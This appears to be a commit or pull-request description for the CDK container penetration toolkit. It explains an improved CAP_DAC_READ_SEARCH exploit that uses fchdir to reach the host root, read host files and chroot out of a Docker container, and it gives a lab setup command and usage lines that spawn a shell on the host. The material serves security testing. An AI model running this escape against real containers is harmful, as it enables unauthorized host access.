feat: better cap_dac_read_search exploit

[verctor]

1. 使用fchdir系统调用进入宿主机root目录，读文件无需猜解fhandle的i_generation，添加chroot到宿主机root的功能，有CAP_SYS_CHROOT的时候可以直接逃逸
2. fchdir从kernel 1.0开始支持该syscall，且docker的seccomp默认不会禁用
3. 复现靶场，该命令运行一个容器即可：docker run -it --rm --cap-add=cap_dac_read_search ubuntu:18.04 bash
4. Usage:

# read file from host
./cdk run cap-dac-read-search <target>

# specify bind mount point file path and read file
./cdk run cap-dac-read-search /etc/hosts /tmp/pwn

# when target file is /, this exploit will chdir to host root and execute a command(default: /bin/bash)
./cdk run cap-dac-read-search /etc/hosts /

# also you can specify what command to be executed, but cdk will recognize the string starting with'-' as its own option, so only some simple commands can be used
./cdk run cap-dac-read-search /etc/hosts / cat /tmp/pwn

1. Use the fchdir system call to enter the host's root directory, read files without guessing the i_generation of fhandle, add the function of chroot to the host's root, you can escape directly when there is CAP_SYS_CHROOT
2. fchdir since kernel 1.0, and seccomp of docker will not be disabled by default
3. To reproduce, run a container with this command: docker run -it --rm --cap-add=cap_dac_read_search ubuntu:18.04 bash

[neargle]

Nice!